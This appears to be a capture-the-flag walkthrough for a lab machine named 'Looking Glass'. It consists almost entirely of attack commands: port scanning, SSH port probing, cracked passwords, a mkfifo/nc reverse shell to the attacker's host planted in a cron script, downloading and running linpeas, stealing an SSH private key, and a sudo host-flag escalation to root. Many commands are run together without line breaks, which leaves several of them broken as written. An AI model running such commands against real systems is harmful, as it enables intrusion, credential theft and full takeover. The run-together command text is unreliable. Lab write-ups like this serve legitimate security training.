Looking Glass
Last updated
Last updated
nmap -sV -sT -O -p 1-65535 $VICTIMnmap -A $VICTIM -oN results.txt
grep -oE '^[0-9]+/' results.txt > num.txt
cat num.txtcat num.txt | tr -d '\n' | sed 's/\//,/g' | tr -d ' 'for port in 9000 9001 9002 9003 9009 9010 9011 9040 9050 9071 9080 9081 9090 9091 9099 9100 9101 9102 9103 9110 9111 9200 9207 9220 9290 9415 9418 9485 9500 9502 9503 9535 9575 9593 9594 9595 9618 9666 9876 9877 9878 9898 9900 9917 9929 9943 9944 9968 9998 9999 10000 10001 10002 10003 10004 10009 10010 10012 10024 10025 10082 10180 10215 10243 10566 10616 10617 10621 10626 10628 10629 10778 11110 11111 11967 12000 12174 12265 12345 13456 13722 13782 13783; do
echo "connecting to port $port"; ssh -o 'LogLevel=ERROR' -o 'StrictHostKeyChecking=no' -p $port test@$VICTIM;done for i in $(seq 12345 13465); do echo "connecting to port $i"; ssh -o 'LogLevel=ERROR' -o 'StrictHostKeyChecking=no' -p $i $VICTIM;done | grep -vE 'Lower|Higher'Key: thealphabetcipherssh $VICTIM -p 12350
Password: bewareTheJabberwockssh jabberwock@$VICTIM
Password: PlaceThanksSelfishGrinnedsudo -lcat /etc/crontabcd /home/jabberwock
vi twasBrillig.shrm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc $KALI 1337 >/tmp/fnc -lvnp 1337sudo /sbin/rebootpython3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fgcd /home/tweedledee
cat humptydumpty.txt sudo -l
sudo -u tweedledum /bin/bash cd /home/tweedledum/
cat humptydumpty.txt su humptydumpty
Password: zyxwvutsrqponmlkcd /home/alice
cat .ssh/id_rsachmod 600 id_rsa
ssh alice@$VICTIM -i id_rsawget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
python2 -m SimpleHTTPServer 81cd /tmp/
wget http://$KALI:81/linpeas.sh
chmod +x linpeas.sh
./linpeas.shcat /etc/sudoers.d/alice
sudo -h ssalg-gnikool -l
sudo -h ssalg-gnikool /bin/bash